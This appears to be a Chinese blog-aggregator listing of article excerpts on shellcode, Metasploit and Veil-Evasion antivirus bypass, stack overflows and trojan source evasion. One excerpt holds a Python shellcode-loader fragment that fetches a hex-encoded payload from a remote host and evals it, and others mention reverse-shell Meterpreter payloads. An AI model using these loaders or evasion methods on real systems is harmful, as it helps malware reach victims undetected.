免杀Shellcode

20169205 2016-2017-2 《网络攻防技术》 免杀技术

201692052016-2017-2《网络攻防技术》免杀技术一、基础问题回答(1)杀软是如何检测出恶意代码的?
weixin_30849591·2020-07-28 17:19

IIS7.0、7.5解析漏洞利用

建议使用免杀马(3)上传WebShell上传制作好的websh
L_KevinK·2020-07-27 16:03

xss跨站脚本漏洞总结

也有黑客把xss当做新型的"缓冲区溢出攻击",而javascript是新型的shellcode。xss最大的特点就是能注入恶意的代码到用户浏览器的网页上。从而达到劫持用户会话
努力奋斗的小青年·2020-07-27 14:14

PWN头秃之旅 - 4.Retrun-into-libc(攻防世界-level2)

Retrun2libc的前提是NX开启,但ASLR关闭,NX开启后,我们无法执行shellcode。Retrun2libc提供了一种绕过思路:修改返回地址,让其指向内存中已有的某个函数。
Sally_Zhang·2020-07-23 15:00

木马源代码免杀处理

木马源代码免杀处理------------------------------------------有加这样免杀的:------------------------------------------
p123456789p·2020-07-16 04:13

动态函数监控技术在缓冲区溢出检测中的应用

同时,对缓冲区溢出shellcode进行了分析,用有限状态自动机的模型描述了缓冲区溢出的入侵及检测模型。最后,将缓冲区溢出的检测模型与函数调用监测结合,提出了一种对缓冲区溢出行为进行动态检测的手段。
iiprogram·2020-07-16 00:23

Flash水坑钓鱼

以后肯定用的到准备flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn一个服务器一个域名一个马子先配置一个马子吧使用常用的CS吧,随便来一个,成功上线关于免杀
god_zZz·2020-07-15 23:15

security cookie

在微软的c/c++编译器中,增加了对于栈溢出进行检测的参数“/GS”,在调试shellcode的时候,发现vs2005产生的code和vc6产生的code有些不同,才让我注意到这个问题。
free2o·2020-07-15 23:39

如何编写自己的缓冲区溢出利用程序

内容:本文主要讲解有关BufferOverflow的原理,以及结合实战范例介绍Linux和Solaris下的漏洞利用.本文并不介绍如何编写shellcode.要求:读者要有一点C和汇编语言基础.目标:希望本文能够尽量做到通熟易懂
TOMMY201112·2020-07-15 19:24

ShellCode

可以在http://shell-storm.org的shellcode数据库shell-storm.org/shellcode/找到一段符合条件的shellcode利用msfvenom生成特定条件的shellcodehttps
HAPPYers·2020-07-15 14:25

C和C++安全编码笔记:指针诡计

可以通过覆盖函数指针将程序的控制权转移到攻击者提供的外壳代码(shellcode)。当程序通过函数指针执行一个函数调用时,攻击者提供的代码将会取代原本希望执行的代码而得到执行。
fengbingchun·2020-07-15 13:10

免杀原理与实践——使用msfvenom与veil绕过杀毒软件

免杀原理与实践——使用msfvenom与veil绕过杀毒软件这次的实验令我非常兴奋,因为要对抗的是各大杀毒软件厂商,所以事先得做好很多功课。
Y_F_Wang·2020-07-15 10:05

远控免杀专题(5)-Veil免杀(VT免杀率23/71)

本专题文章导航1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控免杀专题(2)-msfvenom隐藏的参数:https
shuteer_xu·2020-07-14 22:28

veil-evasion介绍

veil-evasion简介veil-evasion是linux平台的一款免杀工具,可直接通过apt-get安装,用来生成msf的payload,能绕过常见的杀软。
mcc3210·2020-07-14 21:34

Veil-Evasion免杀

Veil-Evasion简介Veil-Evasion是与Metasploit生成相兼容的Payload的一款辅助框架,并可以绕过大多数的杀软。Veil-Evasion并没有集成在kali,配置sources.list,可直接apt-get。Github项目地址:https://github.com/Veil-Framework/Veil-Evasion实验环境攻击机:kaliIP:192.168.
a阿飞·2020-07-14 20:07

veil-Evasion免杀使用

veil-Evasion免杀使用Veil-Evasion是Veil-Framework框架的一部分,也是其主要的项目。
卿's Blog·2020-07-14 16:48

Hackproofing mysql

这是一篇很经典的论文,作者ChrisAnley是shellcodehandbook的作者之一。
moonnight·2020-07-14 09:16

安全漏洞--基于NDAY和0DAY漏洞免杀技巧

一概念简介0day中的0表示zero,早期的0day表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。0day是一个统称,所有的破解都可以叫0day。简而言之,0day就是代表还没有公开的漏洞,nday就是代表已经公开了的漏洞。漏洞开发者在利用0day和Nday时,除了在逃过windos的自身安全机
5t4rk·2020-07-14 08:28

利用MSBuild制作msf免杀的后门

今天看到三好学生对MSBuild的利用,它的好处这里已经说完,http://bobao.360.cn/learning/detail/3046.html,说可以有提供一种直接执行shellcode的方法
ZZZJX7·2020-07-14 06:36

免杀后门之MSF&Veil-Evasion的完美结合

本文由“即刻安全”投稿到“玄魂工作室”Veil-Evasion是Veil-Framework框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的payload!kali上并未安装,下面我们来进行简单的安装。我们直接从github上进行clone下载:gitclonehttps://www.github.com/Veil-Framework/Veil-Evasion.git图1下载完成后,我
xuanhun·2020-07-14 03:15

免杀后门之MSF&Veil-Evasion的完美结合

本文由“即刻安全”投稿到“玄魂工作室”Veil-Evasion是Veil-Framework框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的payload!kali上并未安装,下面我们来进行简单的安装。我们直接从github上进行clone下载:gitclonehttps://www.github.com/Veil-Framework/Veil-Evasion.git图1下载完成后,我
weixin_33749242·2020-07-13 17:16

[Toddler's Bottle]-asm

这题其实就是叫我们自己用汇编写shellcode,只能用syscall调用open,readm,write函数来读取flag自己在本地写个执行shellcode的demo程序//gccshellcode.c-oshellcode-zexecstack-fno-stack-protector
2mpossible·2020-07-13 12:46

kali的payload的使用攻击之直连型payload的使用

一、msfvenom命令简介msfvenom是payload产生器,也是shellcode代码生成器Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。
红尘卖酒人·2020-07-13 12:15

通过Python实现Payload分离免杀过程详解

缺点:编译成exe以后体积过大实现:msf生成shellcode代码:将payload给copy下来,去除引号。
·2020-07-13 10:23

[原]使用python建立后门

inject.dll;后门构建的一般思路为:重命名(或者移动)A.exe为xxx.exe,然后在backdoor中创建A.exe的进程--记为processA;然后向processA中注入DLL(学艺未精,不会写shellcode
PandaraWen·2020-07-13 09:17

编写自己的缓冲区溢出利用程序

编写自己的缓冲区溢出利用程序内容:本文主要讲解有关BufferOverflow的原理,以及结合实战范例介绍linux和Solaris下的漏洞利用.本文并不介绍如何编写shellcode.要求:读者要有一点
lile269·2020-07-13 07:53

MSF——Meterpreter(三)

Meterpreter是Metasploit提供的一个非常强大的后渗透工具Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell这里的payload就是shellcode
dishan4749253·2020-07-13 04:52

metasploit framework 笔记 | msf5 使用技巧

操作系统类型/漏洞类型/具体漏洞模块名称——指定要使用漏洞利用模块②setSRVHOST攻击源IP③setPAYLOADwindows/meterpreter/reverse_tcp——设置攻击载荷,也就是shellcode
Interstellar____·2020-07-13 00:21

Linux kali虚拟机利用msf框架对win7的永恒之蓝渗透

攻击载荷(payload),是我们期望目标系统在渗透攻击之后去执行的代码shellcode,是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写模块(Module),指Metasploit框架中所使用的一段软件代码组件
waitwind1994·2020-07-12 21:57

渗透中POC、EXP、Payload与Shellcode的区别

1.POC、EXP、Payload与ShellcodePOC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。
浅浅爱默默·2020-07-12 13:02

社工找出幕后诈骗的黑手技巧篇

空间朋友圈支付宝照片信息诈骗心理学:社工心理学+七宗罪常见木马诈骗及反击:APP锁机、APP钓鱼软件、钓鱼木马、勒索病毒、常见远控另类工具使用:信息收集:reg007Google必应刑部六司社工工具:社工库搭建密码猜解木马免杀
weixin_34381666·2020-07-12 10:25

栈溢出原理与 shellcode 开发

ESP:该指针永远指向系统栈最上面一个栈帧的栈顶EBP:该指针永远指向系统栈最上面一个栈帧的底部01修改函数返回地址#include#include#definePASSWORD"1234567"intverify_password(char*password){intauthenticated;charbuffer[8];authenticated=strcmp(password,PASSWOR
weixin_30902675·2020-07-12 07:27

PowerShell脚本免杀/bypass/绕过杀毒软件

post=246Xencrypt是一个PowerShell加密程序,以达到某些场景下免杀/bypass/绕过杀毒软件的效果。
wdsj_xh·2020-07-12 05:33

python生成shellcode加载器

importctypes,cPickle,base64,urllib2classptr(object):def__reduce__(self):return(eval,("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))#base64classbuf(object):def__init__(self,sh
#Mr.liao·2020-07-12 01:48

windows下安装TexLive2016,黑窗口一闪而过

为了避免杀毒软件的干扰,关闭了360安全卫士、杀毒软件。双击texlive2016目录里的install-tl-advanced.bat批处理文件,弹出命令行窗口,按任意键结束。
GNG·2020-07-11 23:38

metasploit

Metasploit基础专业术语渗透攻击(exploit)攻击载荷(payload)shellcode模块(module)监听器(Listener)Metasploit用户接口MSF终端MSF命令行Metasploit
qq_42902587·2020-07-11 20:01

栈溢出几种保护方式

栈溢出主要是通过覆盖栈内保存的函数返回地址eip,然后在EIP处写入shellcode地址做的。
groundhappy·2020-07-11 06:48

二进制漏洞:从简单栈溢出到写自己编写shellcode

0x00简介本次主要记录缓冲器溢出的:原理、实现和shellcode的编写详细的去理解原理,和底层开始写shellcode本次实验的C代码#include#include#definePASSWORD"
god_zZz·2020-07-11 06:28

栈溢出的几种保护机制

攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。canary是一
ATFWUS·2020-07-10 20:21

栈溢出 初级教学

一.初探栈溢出1.1在首先在文件夹里面创建一个c的程序StackOF.c内容如下图#include#includeintmain(){puts("SOplzqivemeyourshellcode");charbuffer
Zero_0_0·2020-07-10 17:20

献给markdown初学者!

当下的NT内核提供了ASLR,大大提高了进程被inject后shellcoderun起来的难度;传统NT的ACL模型就不废话了UAC,这货也不扯了EFS和Bitlocker,EFS的易受攻击性已经是被证明的
露华浓·2020-07-10 17:20

免杀原理(转)

看过这篇文章,你会发现免杀是多么的简单,恐怕你该不信任杀毒软件了,跟我一样首先来简单了解一下杀毒软件查杀病毒的原理,当前杀毒软件对病毒的查杀主要有特征代码法和行为监测法。
weixin_34216036·2020-07-10 08:00

smbghost_rce复现(cve-2020-0796)

0x00环境靶机:win101903IP:192.168.0.105攻击机:kaliIP:192.168.0.1040x01msfvenom生成reversedshellcodemsfvenom-ax64
Sn0w33·2020-07-10 05:25

Linux和Windows堆栈溢出利用对比

堆栈溢出的利用,有三大条件,一是返回点的定位,二是ShellCode的编写,三是跳转到ShellCode
PolluxAvenger·2020-07-10 03:46

记录一次入门pwn题--ret2shellcode

ret2shellcode题目是在jarvisOJ上的题目链接:https://dn.jarvisoj.com/challengefiles/level1.80eacdcd51aca92af7749d96efad7fb5
Nitwit·2020-07-09 23:00

实习总结

以前一直觉得安全就是渗透,二进制,IOT,往下学不过是代码审计,免杀提权,内网APT。但在甲方,思考的应该是如何正向的去建设一个企业的安全。怎么把一个项
twosmi1e·2020-07-09 23:00

windows:shellcode 远程线程hook/注入(五)

前面几篇文章介绍了通过APC注入、进程注入、windows窗口处理函数回调、kernercallback回调执行shellcode,今天继续介绍通过heapSpray(翻译成中文叫堆喷射)执行shellcode
第七子007·2020-07-09 22:00

教你怎样源码免杀

源码免杀也离不开手动定位特征码,但是修改比较容易,灵活性也比较大,接下来就听危险漫步给各位慢慢的来分享分析。一、如何查找特征码查找特征码与代码的对应位置,是这篇文章首先需要了解的基础。
H-KING·2020-07-09 19:13

详谈 vc++源码免杀全套思路方法

首先说中国国内杀毒软件的特征。1金山毒霸,我个人觉得杀的代码部分和字符串还是比较普遍的。输入表函数我个人不多见。2瑞星,经实战经验,瑞星杀毒软件是垃圾。过掉金山也就过瑞星了除非杀敏感的字符串。3江民,纯属基本就是杀字符串。。大家可以进行隐藏代码就可以。。你懂得4也就是大家最头疼的360杀毒。这个就是重点。因为过掉360-5引擎基本国内就差不多了。简单介绍下,360云查杀+BD常规+qvm+国外引擎
immortal_mcl·2020-07-09 17:16

免杀与过主动防御

免杀1。
iiprogram·2020-07-09 17:08
上一页 18 19 20 21 22 23 24 25 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他